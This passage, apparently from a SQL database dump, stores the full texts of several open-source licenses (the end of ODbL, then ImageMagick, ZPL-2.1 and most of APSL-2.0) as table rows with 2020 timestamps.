ability of any person to exercise those rights (an \"Unrestricted\nDatabase\"); and\n\niii. The Unrestricted Database is at least as accessible to the recipient\nas a practical matter as the Restricted Database.\n\nc. For the avoidance of doubt, You may place this Database or a Derivative\nDatabase in an authenticated environment, behind a password, or within a similar\naccess control scheme provided that You do not alter or restrict the terms\nof this License or any rights granted under it or have the effect or intent\nof restricting the ability of any person to exercise those rights.\n\n4.8 Licensing of others. You may not sublicense the Database. Each time You\ncommunicate the Database, the whole or Substantial part of the Contents, or\nany Derivative Database to anyone else in any way, the Licensor offers to\nthe recipient a license to the Database on the same terms and conditions as\nthis License. You are not responsible for enforcing compliance by third parties\nwith this License, but You may enforce any rights that You have over a Derivative\nDatabase. You are solely responsible for any modifications of a Derivative\nDatabase made by You or another Person at Your direction. You may not impose\nany further restrictions on the exercise of the rights granted or affirmed\nunder this License.\n\n 5.0 Moral rights\n\n5.1 Moral rights. This section covers moral rights, including any rights to\nbe identified as the author of the Database or to object to treatment that\nwould otherwise prejudice the author\'s honour and reputation, or any other\nderogatory treatment:\n\na. For jurisdictions allowing waiver of moral rights, Licensor waives all\nmoral rights that Licensor may have in the Database to the fullest extent\npossible by the law of the relevant jurisdiction under Section 10.4;\n\nb. If waiver of moral rights under Section 5.1 a in the relevant jurisdiction\nis not possible, Licensor agrees not to assert any moral rights over the Database\nand waives all claims in moral rights to the fullest extent possible by the\nlaw of the relevant jurisdiction under Section 10.4; and\n\nc. For jurisdictions not allowing waiver or an agreement not to assert moral\nrights under Section 5.1 a and b, the author may retain their moral rights\nover certain aspects of the Database.\n\nPlease note that some jurisdictions do not allow for the waiver of moral rights,\nand so moral rights may still subsist over the Database in some jurisdictions.\n\n 6.0 Fair dealing, Database exceptions, and other rights not affected\n\n6.1 This License does not affect any rights that You or anyone else may independently\nhave under any applicable law to make any use of this Database, including\nwithout limitation:\n\na. Exceptions to the Database Right including: Extraction of Contents from\nnon-electronic Databases for private purposes, Extraction for purposes of\nillustration for teaching or scientific research, and Extraction or Re-utilisation\nfor public security or an administrative or judicial procedure.\n\nb. Fair dealing, fair use, or any other legally recognised limitation or exception\nto infringement of copyright or other applicable laws.\n\n6.2 This License does not affect any rights of lawful users to Extract and\nRe-utilise insubstantial parts of the Contents, evaluated quantitatively or\nqualitatively, for any purposes whatsoever, including creating a Derivative\nDatabase (subject to other rights over the Contents, see Section 2.4). The\nrepeated and systematic Extraction or Re-utilisation of insubstantial parts\nof the Contents may however amount to the Extraction or Re-utilisation of\na Substantial part of the Contents.\n\n 7.0 Warranties and Disclaimer\n\n7.1 The Database is licensed by the Licensor \"as is\" and without any warranty\nof any kind, either express, implied, or arising by statute, custom, course\nof dealing, or trade usage. Licensor specifically disclaims any and all implied\nwarranties or conditions of title, non-infringement, accuracy or completeness,\nthe presence or absence of errors, fitness for a particular purpose, merchantability,\nor otherwise. Some jurisdictions do not allow the exclusion of implied warranties,\nso this exclusion may not apply to You.\n\n 8.0 Limitation of liability\n\n8.1 Subject to any liability that may not be excluded or limited by law, the\nLicensor is not liable for, and expressly excludes, all liability for loss\nor damage however and whenever caused to anyone by any use under this License,\nwhether by You or by anyone else, and whether caused by any fault on the part\nof the Licensor or not. This exclusion of liability includes, but is not limited\nto, any special, incidental, consequential, punitive, or exemplary damages\nsuch as loss of revenue, data, anticipated profits, and lost business. This\nexclusion applies even if the Licensor has been advised of the possibility\nof such damages.\n\n8.2 If liability may not be excluded by law, it is limited to actual and direct\nfinancial loss to the extent it is caused by proved negligence on the part\nof the Licensor.\n\n 9.0 Termination of Your rights under this License\n\n9.1 Any breach by You of the terms and conditions of this License automatically\nterminates this License with immediate effect and without notice to You. For\nthe avoidance of doubt, Persons who have received the Database, the whole\nor a Substantial part of the Contents, Derivative Databases, or the Database\nas part of a Collective Database from You under this License will not have\ntheir licenses terminated provided their use is in full compliance with this\nLicense or a license granted under Section 4.8 of this License. Sections 1,\n2, 7, 8, 9 and 10 will survive any termination of this License.\n\n9.2 If You are not in breach of the terms of this License, the Licensor will\nnot terminate Your rights under it.\n\n9.3 Unless terminated under Section 9.1, this License is granted to You for\nthe duration of applicable rights in the Database.\n\n9.4 Reinstatement of rights. If you cease any breach of the terms and conditions\nof this License, then your full rights under this License will be reinstated:\n\na. Provisionally and subject to permanent termination until the 60th day after\ncessation of breach;\n\nb. Permanently on the 60th day after cessation of breach unless otherwise\nreasonably notified by the Licensor; or\n\nc. Permanently if reasonably notified by the Licensor of the violation, this\nis the first time You have received notice of violation of this License from\nthe Licensor, and You cure the violation prior to 30 days after your receipt\nof the notice.\n\nPersons subject to permanent termination of rights are not eligible to be\na recipient and receive a license under Section 4.8.\n\n9.5 Notwithstanding the above, Licensor reserves the right to release the\nDatabase under different license terms or to stop distributing or making available\nthe Database. Releasing the Database under different license terms or stopping\nthe distribution of the Database will not withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 10.0 General\n\n10.1 If any provision of this License is held to be invalid or unenforceable,\nthat must not affect the validity or enforceability of the remainder of the\nterms and conditions of this License and each remaining provision of this\nLicense shall be valid and enforced to the fullest extent permitted by law.\n\n10.2 This License is the entire agreement between the parties with respect\nto the rights granted here over the Database. It replaces any earlier understandings,\nagreements or representations with respect to the Database.\n\n10.3 If You are in breach of the terms of this License, You will not be entitled\nto rely on the terms of this License or to complain of any breach by the Licensor.\n\n10.4 Choice of law. This License takes effect in and will be governed by the\nlaws of the relevant jurisdiction in which the License terms are sought to\nbe enforced. If the standard suite of rights granted under applicable copyright\nlaw and Database Rights in the relevant jurisdiction includes additional rights\nnot granted under this License, these additional rights are granted in this\nLicense in order to meet the terms of this License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(35,'ImageMagick','Before we get to the text of the license, lets just review what the license\nsays in simple terms:\n\nIt allows you to:\n\n* freely download and use ImageMagick software, in whole or in part, for personal,\ncompany internal, or commercial purposes;\n\n * use ImageMagick software in packages or distributions that you create;\n\n * link against a library under a different license;\n\n * link code under a different license against a library under this license;\n\n * merge code into a work under a different license;\n\n * extend patent grants to any code using code under this license;\n\n * and extend patent protection.\n\nIt forbids you to:\n\n* redistribute any piece of ImageMagick-originated software without proper\nattribution;\n\n* use any marks owned by ImageMagick Studio LLC in any way that might state\nor imply that ImageMagick Studio LLC endorses your distribution;\n\n* use any marks owned by ImageMagick Studio LLC in any way that might state\nor imply that you created the ImageMagick software in question.\n\nIt requires you to:\n\n* include a copy of the license in any redistribution you may make that includes\nImageMagick software;\n\n* provide clear attribution to ImageMagick Studio LLC for any distributions\nthat include ImageMagick software.\n\nIt does not require you to:\n\n* include the source of the ImageMagick software itself, or of any modifications\nyou may have made to it, in any redistribution you may assemble that includes\nit;\n\n* submit changes that you make to the software back to the ImageMagick Studio\nLLC (though such feedback is encouraged).\n\nA few other clarifications include:\n\n * ImageMagick is freely available without charge;\n\n* you may include ImageMagick on a DVD as long as you comply with the terms\nof the license;\n\n* you can give modified code away for free or sell it under the terms of the\nImageMagick license or distribute the result under a different license, but\nyou need to acknowledge the use of the ImageMagick software;\n\n * the license is compatible with the GPL V3.\n\n * when exporting the ImageMagick software, review its export classification.\n\nTerms and Conditions for Use, Reproduction, and Distribution\n\nThe legally binding and authoritative terms and conditions for use, reproduction,\nand distribution of ImageMagick follow:\n\nCopyright 1999-2013 ImageMagick Studio LLC, a non-profit organization dedicated\nto making software imaging solutions freely available.\n\n 1. Definitions.\n\nLicense shall mean the terms and conditions for use, reproduction, and distribution\nas defined by Sections 1 through 9 of this document.\n\nLicensor shall mean the copyright owner or entity authorized by the copyright\nowner that is granting the License.\n\nLegal Entity shall mean the union of the acting entity and all other entities\nthat control, are controlled by, or are under common control with that entity.\nFor the purposes of this definition, control means (i) the power, direct or\nindirect, to cause the direction or management of such entity, whether by\ncontract or otherwise, or (ii) ownership of fifty percent (50%) or more of\nthe outstanding shares, or (iii) beneficial ownership of such entity.\n\nYou (or Your) shall mean an individual or Legal Entity exercising permissions\ngranted by this License.\n\nSource form shall mean the preferred form for making modifications, including\nbut not limited to software source code, documentation source, and configuration\nfiles.\n\nObject form shall mean any form resulting from mechanical transformation or\ntranslation of a Source form, including but not limited to compiled object\ncode, generated documentation, and conversions to other media types.\n\nWork shall mean the work of authorship, whether in Source or Object form,\nmade available under the License, as indicated by a copyright notice that\nis included in or attached to the work (an example is provided in the Appendix\nbelow).\n\nDerivative Works shall mean any work, whether in Source or Object form, that\nis based on (or derived from) the Work and for which the editorial revisions,\nannotations, elaborations, or other modifications represent, as a whole, an\noriginal work of authorship. For the purposes of this License, Derivative\nWorks shall not include works that remain separable from, or merely link (or\nbind by name) to the interfaces of, the Work and Derivative Works thereof.\n\nContribution shall mean any work of authorship, including the original version\nof the Work and any modifications or additions to that Work or Derivative\nWorks thereof, that is intentionally submitted to Licensor for inclusion in\nthe Work by the copyright owner or by an individual or Legal Entity authorized\nto submit on behalf of the copyright owner. For the purposes of this definition,\n\"submitted\" means any form of electronic, verbal, or written communication\nsent to the Licensor or its representatives, including but not limited to\ncommunication on electronic mailing lists, source code control systems, and\nissue tracking systems that are managed by, or on behalf of, the Licensor\nfor the purpose of discussing and improving the Work, but excluding communication\nthat is conspicuously marked or otherwise designated in writing by the copyright\nowner as Not a Contribution.\n\nContributor shall mean Licensor and any individual or Legal Entity on behalf\nof whom a Contribution has been received by Licensor and subsequently incorporated\nwithin the Work.\n\n2. Grant of Copyright License. Subject to the terms and conditions of this\nLicense, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive,\nno-charge, royalty-free, irrevocable copyright license to reproduce, prepare\nDerivative Works of, publicly display, publicly perform, sublicense, and distribute\nthe Work and such Derivative Works in Source or Object form.\n\n3. Grant of Patent License. Subject to the terms and conditions of this License,\neach Contributor hereby grants to You a perpetual, worldwide, non-exclusive,\nno-charge, royalty-free, irrevocable patent license to make, have made, use,\noffer to sell, sell, import, and otherwise transfer the Work, where such license\napplies only to those patent claims licensable by such Contributor that are\nnecessarily infringed by their Contribution(s) alone or by combination of\ntheir Contribution(s) with the Work to which such Contribution(s) was submitted.\nIf You institute patent litigation against any entity (including a cross-claim\nor counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated\nwithin the Work constitutes direct or contributory patent infringement, then\nany patent licenses granted to You under this License for that Work shall\nterminate as of the date such litigation is filed.\n\n4. Redistribution. You may reproduce and distribute copies of the Work or\nDerivative Works thereof in any medium, with or without modifications, and\nin Source or Object form, provided that You meet the following conditions:\n\na. You must give any other recipients of the Work or Derivative Works a copy\nof this License; and\n\nb. You must cause any modified files to carry prominent notices stating that\nYou changed the files; and\n\nc. You must retain, in the Source form of any Derivative Works that You distribute,\nall copyright, patent, trademark, and attribution notices from the Source\nform of the Work, excluding those notices that do not pertain to any part\nof the Derivative Works; and\n\nd. If the Work includes a \"NOTICE\" text file as part of its distribution,\nthen any Derivative Works that You distribute must include a readable copy\nof the attribution notices contained within such NOTICE file, excluding those\nnotices that do not pertain to any part of the Derivative Works, in at least\none of the following places: within a NOTICE text file distributed as part\nof the Derivative Works; within the Source form or documentation, if provided\nalong with the Derivative Works; or, within a display generated by the Derivative\nWorks, if and wherever such third-party notices normally appear. The contents\nof the NOTICE file are for informational purposes only and do not modify the\nLicense. You may add Your own attribution notices within Derivative Works\nthat You distribute, alongside or as an addendum to the NOTICE text from the\nWork, provided that such additional attribution notices cannot be construed\nas modifying the License.\n\nYou may add Your own copyright statement to Your modifications and may provide\nadditional or different license terms and conditions for use, reproduction,\nor distribution of Your modifications, or for any such Derivative Works as\na whole, provided Your use, reproduction, and distribution of the Work otherwise\ncomplies with the conditions stated in this License.\n\n5. Submission of Contributions. Unless You explicitly state otherwise, any\nContribution intentionally submitted for inclusion in the Work by You to the\nLicensor shall be under the terms and conditions of this License, without\nany additional terms or conditions. Notwithstanding the above, nothing herein\nshall supersede or modify the terms of any separate license agreement you\nmay have executed with Licensor regarding such Contributions.\n\n6. Trademarks. This License does not grant permission to use the trade names,\ntrademarks, service marks, or product names of the Licensor, except as required\nfor reasonable and customary use in describing the origin of the Work and\nreproducing the content of the NOTICE file.\n\n7. Disclaimer of Warranty. Unless required by applicable law or agreed to\nin writing, Licensor provides the Work (and each Contributor provides its\nContributions) on an AS IS BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied, including, without limitation, any warranties\nor conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR\nA PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness\nof using or redistributing the Work and assume any risks associated with Your\nexercise of permissions under this License.\n\n8. Limitation of Liability. In no event and under no legal theory, whether\nin tort (including negligence), contract, or otherwise, unless required by\napplicable law (such as deliberate and grossly negligent acts) or agreed to\nin writing, shall any Contributor be liable to You for damages, including\nany direct, indirect, special, incidental, or consequential damages of any\ncharacter arising as a result of this License or out of the use or inability\nto use the Work (including but not limited to damages for loss of goodwill,\nwork stoppage, computer failure or malfunction, or any and all other commercial\ndamages or losses), even if such Contributor has been advised of the possibility\nof such damages.\n\n9. Accepting Warranty or Additional Liability. While redistributing the Work\nor Derivative Works thereof, You may choose to offer, and charge a fee for,\nacceptance of support, warranty, indemnity, or other liability obligations\nand/or rights consistent with this License. However, in accepting such obligations,\nYou may act only on Your own behalf and on Your sole responsibility, not on\nbehalf of any other Contributor, and only if You agree to indemnify, defend,\nand hold each Contributor harmless for any liability incurred by, or claims\nasserted against, such Contributor by reason of your accepting any such warranty\nor additional liability. How to Apply the License to your Work\n\nTo apply the ImageMagick License to your work, attach the following boilerplate\nnotice, with the fields enclosed by brackets \"[]\" replaced with your own identifying\ninformation (don\'t include the brackets). The text should be enclosed in the\nappropriate comment syntax for the file format. We also recommend that a file\nor class name and description of purpose be included on the same \"printed\npage\" as the copyright notice for easier identification within third-party\narchives.\n\nCopyright [yyyy] [name of copyright owner]\n\nLicensed under the ImageMagick License (the \"License\"); you may not use this\nfile except in compliance with the License. You may obtain a copy of the License\nat\n\nhttp://www.imagemagick.org/script/license.php\n\nUnless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(36,'ZPL-2.1','Zope Public License (ZPL) Version 2.1 A copyright notice accompanies this\nlicense document that identifies the copyright holders.\n\nThis license has been certified as open source. It has also been designated\nas GPL compatible by the Free Software Foundation (FSF).\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions in source code must retain the accompanying copyright notice,\nthis list of conditions, and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the accompanying copyright\nnotice, this list of conditions, and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. Names of the copyright holders must not be used to endorse or promote products\nderived from this software without prior written permission from the copyright\nholders.\n\n4. The right to distribute this software or to use it for any purpose does\nnot give you the right to use Servicemarks (sm) or Trademarks (tm) of the\ncopyright holders. Use of them is covered by separate agreement with the copyright\nholders.\n\n5. If any files are modified, you must cause the modified files to carry prominent\nnotices stating that you changed the files and the date of any change.\n\nDisclaimer\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS\'\' AND ANY EXPRESSED\nOR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN\nNO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(37,'APSL-2.0','APPLE PUBLIC SOURCE LICENSE\n\nVersion 2.0 - August 6, 2003 Please read this License carefully before downloading\nthis software. By downloading or using this software, you are agreeing to\nbe bound by the terms of this License. If you do not or cannot agree to the\nterms of this License, please do not download or use the software.\n\nApple Note: In January 2007, Apple changed its corporate name from \"Apple\nComputer, Inc.\" to \"Apple Inc.\" This change has been reflected below and copyright\nyears updated, but no other changes have been made to the APSL 2.0.\n\n1. General; Definitions. This License applies to any program or other work\nwhich Apple Inc. (\"Apple\") makes publicly available and which contains a notice\nplaced by Apple identifying such program or work as \"Original Code\" and stating\nthat it is subject to the terms of this Apple Public Source License version\n2.0 (\"License\"). As used in this License:\n\n1.1 \"Applicable Patent Rights\" mean: (a) in the case where Apple is the grantor\nof rights, (i) claims of patents that are now or hereafter acquired, owned\nby or assigned to Apple and (ii) that cover subject matter contained in the\nOriginal Code, but only to the extent necessary to use, reproduce and/or distribute\nthe Original Code without infringement; and (b) in the case where You are\nthe grantor of rights, (i) claims of patents that are now or hereafter acquired,\nowned by or assigned to You and (ii) that cover subject matter in Your Modifications,\ntaken alone or in combination with Original Code.\n\n1.2 \"Contributor\" means any person or entity that creates or contributes to\nthe creation of Modifications.\n\n1.3 \"Covered Code\" means the Original Code, Modifications, the combination\nof Original Code and any Modifications, and/or any respective portions thereof.\n\n1.4 \"Externally Deploy\" means: (a) to sublicense, distribute or otherwise\nmake Covered Code available, directly or indirectly, to anyone other than\nYou; and/or (b) to use Covered Code, alone or as part of a Larger Work, in\nany way to provide a service, including but not limited to delivery of content,\nthrough electronic communication with a client other than You.\n\n1.5 \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n1.6 \"Modifications\" mean any addition to, deletion from, and/or change to,\nthe substance and/or structure of the Original Code, any previous Modifications,\nthe combination of Original Code and any previous Modifications, and/or any\nrespective portions thereof. When code is released as a series of files, a\nModification is: (a) any addition to or deletion from the contents of a file\ncontaining Covered Code; and/or (b) any new file or other representation of\ncomputer program statements that contains any part of Covered Code.\n\n1.7 \"Original Code\" means (a) the Source Code of a program or other work as\noriginally made available by Apple under this License, including the Source\nCode of any updates or upgrades to such programs or works made available by\nApple under this License, and that has been expressly identified by Apple\nas such in the header file(s) of such work; and (b) the object code compiled\nfrom such Source Code and originally made available by Apple under this License\n\n1.8 \"Source Code\" means the human readable form of a program or other work\nthat is suitable for making modifications to it, including all modules it\ncontains, plus any associated interface definition files, scripts used to\ncontrol compilation and installation of an executable (object code).\n\n1.9 \"You\" or \"Your\" means an individual or a legal entity exercising rights\nunder this License. For legal entities, \"You\" or \"Your\" includes any entity\nwhich controls, is controlled by, or is under common control with, You, where\n\"control\" means (a) the power, direct or indirect, to cause the direction\nor management of such entity, whether by contract or otherwise, or (b) ownership\nof fifty percent (50%) or more of the outstanding shares or beneficial ownership\nof such entity.\n\n2. Permitted Uses; Conditions & Restrictions. Subject to the terms and conditions\nof this License, Apple hereby grants You, effective on the date You accept\nthis License and download the Original Code, a world-wide, royalty-free, non-exclusive\nlicense, to the extent of Apple\'s Applicable Patent Rights and copyrights\ncovering the Original Code, to do the following:\n\n2.1 Unmodified Code. You may use, reproduce, display, perform, internally\ndistribute within Your organization, and Externally Deploy verbatim, unmodified\ncopies of the Original Code, for commercial or non-commercial purposes, provided\nthat in each instance:\n\n(a) You must retain and reproduce in all copies of Original Code the copyright\nand other proprietary notices and disclaimers of Apple as they appear in the\nOriginal Code, and keep intact all notices in the Original Code that refer\nto this License; and\n\n(b) You must include a copy of this License with every copy of Source Code\nof Covered Code and documentation You distribute or Externally Deploy, and\nYou may not offer or impose any terms on such Source Code that alter or restrict\nthis License or the recipients\' rights hereunder, except as permitted under\nSection 6.\n\n2.2 Modified Code. You may modify Covered Code and use, reproduce, display,\nperform, internally distribute within Your organization, and Externally Deploy\nYour Modifications and Covered Code, for commercial or non-commercial purposes,\nprovided that in each instance You also meet all of these conditions:\n\n(a) You must satisfy all the conditions of Section 2.1 with respect to the\nSource Code of the Covered Code;\n\n(b) You must duplicate, to the extent it does not already exist, the notice\nin Exhibit A in each file of the Source Code of all Your Modifications, and\ncause the modified files to carry prominent notices stating that You changed\nthe files and the date of any change; and\n\n(c) If You Externally Deploy Your Modifications, You must make Source Code\nof all Your Externally Deployed Modifications either available to those to\nwhom You have Externally Deployed Your Modifications, or publicly available.\nSource Code of Your Externally Deployed Modifications must be released under\nthe terms set forth in this License, including the license grants set forth\nin Section 3 below, for as long as you Externally Deploy the Covered Code\nor twelve (12) months from the date of initial External Deployment, whichever\nis longer. You should preferably distribute the Source Code of Your Externally\nDeployed Modifications electronically (e.g. download from a web site).\n\n2.3 Distribution of Executable Versions. In addition, if You Externally Deploy\nCovered Code (Original Code and/or Modifications) in object code, executable\nform only, You must include a prominent notice, in the code itself as well\nas in related documentation, stating that Source Code of the Covered Code\nis available under the terms of this License with information on how and where\nto obtain such Source Code.\n\n2.4 Third Party Rights. You expressly acknowledge and agree that although\nApple and each Contributor grants the licenses to their respective portions\nof the Covered Code set forth herein, no assurances are provided by Apple\nor any Contributor that the Covered Code does not infringe the patent or other\nintellectual property rights of any other entity. Apple and each Contributor\ndisclaim any liability to You for claims brought by any other entity based\non infringement of intellectual property rights or otherwise. As a condition\nto exercising the rights and licenses granted hereunder, You hereby assume\nsole responsibility to secure any other intellectual property rights needed,\nif any. For example, if a third party patent license is required to allow\nYou to distribute the Covered Code, it is Your responsibility to acquire that\nlicense before distributing the Covered Code.\n\n3. Your Grants. In consideration of, and as a condition to, the licenses granted\nto You under this License, You hereby grant to any person or entity receiving\nor distributing Covered Code under this License a non-exclusive, royalty-free,\nperpetual, irrevocable license, under Your Applicable Patent Rights and other\nintellectual property rights (other than patent) owned or controlled by You,\nto use, reproduce, display, perform, modify, sublicense, distribute and Externally\nDeploy Your Modifications of the same scope and extent as Apple\'s licenses\nunder Sections 2.1 and 2.2 above.\n\n4. Larger Works. You may create a Larger Work by combining Covered Code with\nother code not governed by the terms of this License and distribute the Larger\nWork as a single product. In each such instance, You must make sure the requirements\nof this License are fulfilled for the Covered Code or any portion thereof.\n\n5. Limitations on Patent License. Except as expressly stated in Section 2,\nno other patent rights, express or implied, are granted by Apple herein. Modifications\nand/or Larger Works may require additional patent licenses from Apple which\nApple may grant in its sole discretion.\n\n6. Additional Terms. You may choose to offer, and to charge a fee for, warranty,\nsupport, indemnity or liability obligations and/or other rights consistent\nwith the scope of the license granted herein (\"Additional Terms\") to one or\nmore recipients of Covered Code. However, You may do so only on Your own behalf\nand as Your sole responsibility, and not on behalf of Apple or any Contributor.\nYou must obtain the recipient\'s agreement that any such Additional Terms are\noffered by You alone, and You hereby agree to indemnify, defend and hold Apple\nand every Contributor harmless for any liability incurred by or claims asserted\nagainst Apple or such Contributor by reason of any such Additional Terms.\n\n7. Versions of the License. Apple may publish revised and/or new versions\nof this License from time to time. Each version will be given a distinguishing\nversion number. Once Original Code has been published under a particular version\nof this License, You may continue to use it under the terms of that version.\nYou may also choose to use such Original Code under the terms of any subsequent\nversion of this License published by Apple. No one other than Apple has the\nright to modify the terms applicable to Covered Code created under this License.\n\n8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in part\npre-release, untested, or not fully tested works. The Covered Code may contain\nerrors that could cause failures or loss of data, and may be incomplete or\ncontain inaccuracies. You expressly acknowledge and agree that use of the\nCovered Code, or any portion thereof, is at Your sole and entire risk. THE\nCOVERED CODE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY, UPGRADES OR SUPPORT\nOF ANY KIND AND APPLE AND APPLE\'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS\n\"APPLE\" FOR THE PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY\nDISCLAIM ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING,\nBUT NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF MERCHANTABILITY,\nOF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR PURPOSE, OF ACCURACY,\nOF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. APPLE AND EACH\nCONTRIBUTOR DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT OF THE\nCOVERED CODE, THAT THE FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR\nREQUIREMENTS, THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED\nOR ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO ORAL\nOR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE AUTHORIZED REPRESENTATIVE\nOR ANY CONTRIBUTOR SHALL CREATE A WARRANTY. You acknowledge that the Covered\nCode is not intended for use in the operation of nuclear facilities, aircraft\nnavigation, communication systems, or air traffic control machines in which\ncase the failure of the Covered Code could lead to death, personal injury,\nor severe physical or environmental damage.\n\n9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO EVENT\nSHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL, SPECIAL, INDIRECT\nOR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING TO THIS LICENSE OR YOUR\nUSE OR INABILITY TO USE THE COVERED CODE, OR ANY PORTION THEREOF, WHETHER\nUNDER A THEORY OF CONTRACT, WARRANTY, TORT (INCLUDING NEGLIGENCE), PRODUCTS\nLIABILITY OR OTHERWISE, EVEN IF APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL\nPURPOSE OF ANY REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY\nOF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY TO\nYOU. In no event shall Apple\'s total liability to You for all damages (other\nthan as may be required by applicable law) under this License exceed the amount\nof fifty dollars ($50.00).\n\n10. Trademarks. This License does not grant any rights to use the trademarks\nor trade names \"Apple\", \"Mac\", \"Mac OS\", \"QuickTime\", \"QuickTime Streaming\nServer\" or any other trademarks, service marks, logos or trade names belonging\nto Apple (collectively \"Apple Marks\") or to any trademark, service mark, logo\nor trade name belonging to any Contributor. You agree not to use any Apple\nMarks in or as part of the name of products derived from the Original Code\nor to endorse or promote products derived from the Original Code other than\nas expressly permitted by and in strict compliance at all times with Apple\'s\nthird party trademark usage guidelines which are posted at http://www.apple.com/legal/guidelinesfor3rdparties.html.\n\n11. Ownership. Subject to the licenses granted under this License, each Contributor\nretains all rights, title and interest in and to any Modifications made by\nsuch Contributor. Apple retains all rights, title and interest in and to the\nOriginal Code and any Modifications made by or on behalf of Apple (\"Apple\nModifications\"), and such Apple Modifications will not be automatically subject\nto this License. Apple may, at its sole discretion, choose to license such\nApple Modifications under this License, or on different terms from those contained\nin this License or may choose not to license them at all.\n\n 12. Termination.\n\n12.1 Termination. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice from Apple if You fail to comply with any\nterm(s) of this License and fail to cure such breach within 30 days of becoming\naware of such breach;\n\n(b) immediately in the event of the circumstances described in Section 13.5(b);\nor\n\n(c) automatically without notice from Apple if You, at any time during the\nterm of this License, commence an action for patent infringement against Apple;\nprovided that Apple did not first commence an action for patent infringement\nagainst You in that instance.\n\n12.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification, sublicensing and distribution\nof the Covered Code. All sublicenses to the Covered Code which have been properly\ngranted prior to termination shall survive any termination of this License.\nProvisions which, by their nature, should remain in effect beyond the termination\nof this License shall survive, including but not limited to Sections 3, 5,\n8, 9, 10, 11, 12.2 and 13. No party will be liable to any other for compensation,\nindemnity or damages of any sort solely as a result of terminating this License\nin accordance with its terms, and termination of this License will be without\nprejudice to any other right or remedy of any party.\n\n 13. Miscellaneous.\n\n13.1 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in accordance with FAR 12.211 (Technical Data) and 12.212 (Computer\nSoftware) and, for Department of Defense purchases, DFAR 252.227-7015 (Technical\nData -- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n13.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween or among You, Apple or any Contributor, and You will not represent\nto the contrary, whether expressly, by implication, appearance or otherwise.\n\n13.3 Independent Development. Nothing in this License will impair Apple\'s\nright to acquire, license, develop, have others develop for it, market and/or\ndistribute technology or products that perform the same or similar functions\nas, or otherwise compete with, Modifications, Larger Works, technology or\nproducts that You may develop, produce, market or distribute.\n\n13.4 Waiver; Construction. Failure by Apple or any Contributor to enforce\nany provision of this License will not be deemed a waiver of future enforcement\nof that or any other provision. Any law or regulation which provides that\nthe language of a contract shall be construed against the drafter will not\napply to this License.\n\n13.5 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) 